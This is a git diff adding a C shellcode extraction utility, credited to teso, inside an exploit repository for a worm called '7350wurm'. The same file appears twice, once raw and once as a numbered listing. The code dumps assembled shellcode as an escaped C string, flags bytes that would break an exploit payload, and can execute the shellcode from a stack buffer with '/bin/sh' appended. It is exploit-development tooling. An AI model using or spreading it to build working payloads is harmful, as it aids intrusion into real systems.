1 files changed, 93 insertions, 0 deletions
diff --git a/exploits/7350wurm/shellcode/codedump.c b/exploits/7350wurm/shellcode/codedump.c
new file mode 100644
index 0000000..9494b9e
--- /dev/null
+++ b/exploits/7350wurm/shellcode/codedump.c
@@ -0,0 +1,93 @@
+/* shellcode extraction utility,
+ * by type / teso, small mods by scut.
+ */
+#include <stdio.h>
+#include <stdlib.h>
+#include <ctype.h>
+#ifdef IRIX
+#include <sys/cachectl.h>
+#endif
+#ifdef HPUX
+extern char *   cbegin;
+extern char *   cend;
+#else
+extern void     cbegin ();
+extern void     cend ();
+#endif
+typedef void (* fptr)(void);
+int
+bad (unsigned char u);
+int
+main (int argc, char *argv[])
+{
+        int             i,
+                        bbytes = 0;
+        unsigned char * buf = (unsigned char *) cbegin;
+        unsigned char   ebuf[1024];
+        fptr            ebuf_p = (fptr) &ebuf[0];
+        fprintf (stderr, "/* %lu byte shellcode */\n",
+                (unsigned long int) cend - (unsigned long int) cbegin);
+        for (i = 0 ; buf < (unsigned char *) cend; ++buf) {
+                if (i % 12 == 0 && buf > (unsigned char *) cbegin)
+                        printf ("\n");
+                if (i % 12 == 0)
+                        printf ("\"");
+                if (bad (*buf & 0xff)) {
+                        printf ("_\\x%02x_", *buf & 0xff);
+                        bbytes += 1;
+                } else {
+                        printf ("\\x%02x", *buf & 0xff);
+                }
+                if (++i >= 12) {
+                        i = 0;
+                        printf ("\"");
+                }
+        }
+        if (i % 12 == 0)
+                printf (";\n");
+        else
+                printf ("\";\n");
+        printf("\n");
+        fprintf (stderr, "bad bytes = %d\n", bbytes);
+        if (argc > 1) {
+                memcpy (ebuf, cbegin, (unsigned long int) cend -
+                        (unsigned long int) cbegin);
+#ifdef IRIX
+                memcpy (ebuf + ((unsigned long int) cend -
+                        (unsigned long int) cbegin), "/bin/sh\x42_ABCDEFGHIJKLMNOPQRSTUVWXYZ", 40);
+                cacheflush (ebuf, sizeof (ebuf), BCACHE);
+#endif
+                ebuf_p ();
+        }
+        exit (EXIT_SUCCESS);
+}
+int
+bad (unsigned char u)
+{
+        if (u == '\x00' || u == '\x0a' || u == '\x0d' || u == '\x25')
+                return (1);
+        return (0);
+}

diff --git a/exploits/7350wurm/shellcode/codedump.c b/exploits/7350wurm/shellcode/codedump.c new file mode 100644 index 0000000..9494b9e --- /dev/null +++ b/exploits/7350wurm/shellcode/codedump.c
@@ -0,0 +1,93 @@
	1	/* shellcode extraction utility,
	2	* by type / teso, small mods by scut.
	3	*/
	4
	5
	6	#include <stdio.h>
	7	#include <stdlib.h>
	8	#include <ctype.h>
	9
	10	#ifdef IRIX
	11	#include <sys/cachectl.h>
	12	#endif
	13
	14	#ifdef HPUX
	15	extern char * cbegin;
	16	extern char * cend;
	17	#else
	18	extern void cbegin ();
	19	extern void cend ();
	20	#endif
	21
	22	typedef void (* fptr)(void);
	23
	24	int
	25	bad (unsigned char u);
	26
	27
	28	int
	29	main (int argc, char *argv[])
	30	{
	31	int i,
	32	bbytes = 0;
	33	unsigned char * buf = (unsigned char *) cbegin;
	34
	35	unsigned char ebuf[1024];
	36	fptr ebuf_p = (fptr) &ebuf[0];
	37
	38
	39	fprintf (stderr, "/* %lu byte shellcode */\n",
	40	(unsigned long int) cend - (unsigned long int) cbegin);
	41
	42	for (i = 0 ; buf < (unsigned char *) cend; ++buf) {
	43	if (i % 12 == 0 && buf > (unsigned char *) cbegin)
	44	printf ("\n");
	45	if (i % 12 == 0)
	46	printf ("\"");
	47
	48	if (bad (*buf & 0xff)) {
	49	printf ("_\\x%02x_", *buf & 0xff);
	50	bbytes += 1;
	51	} else {
	52	printf ("\\x%02x", *buf & 0xff);
	53	}
	54
	55	if (++i >= 12) {
	56	i = 0;
	57	printf ("\"");
	58	}
	59	}
	60	if (i % 12 == 0)
	61	printf (";\n");
	62	else
	63	printf ("\";\n");
	64
	65	printf("\n");
	66
	67	fprintf (stderr, "bad bytes = %d\n", bbytes);
	68
	69	if (argc > 1) {
	70	memcpy (ebuf, cbegin, (unsigned long int) cend -
	71	(unsigned long int) cbegin);
	72	#ifdef IRIX
	73	memcpy (ebuf + ((unsigned long int) cend -
	74	(unsigned long int) cbegin), "/bin/sh\x42_ABCDEFGHIJKLMNOPQRSTUVWXYZ", 40);
	75	cacheflush (ebuf, sizeof (ebuf), BCACHE);
	76	#endif
	77	ebuf_p ();
	78	}
	79
	80	exit (EXIT_SUCCESS);
	81	}
	82
	83
	84	int
	85	bad (unsigned char u)
	86	{
	87	if (u == '\x00' \|\| u == '\x0a' \|\| u == '\x0d' \|\| u == '\x25')
	88	return (1);
	89
	90	return (0);
	91	}
	92
	93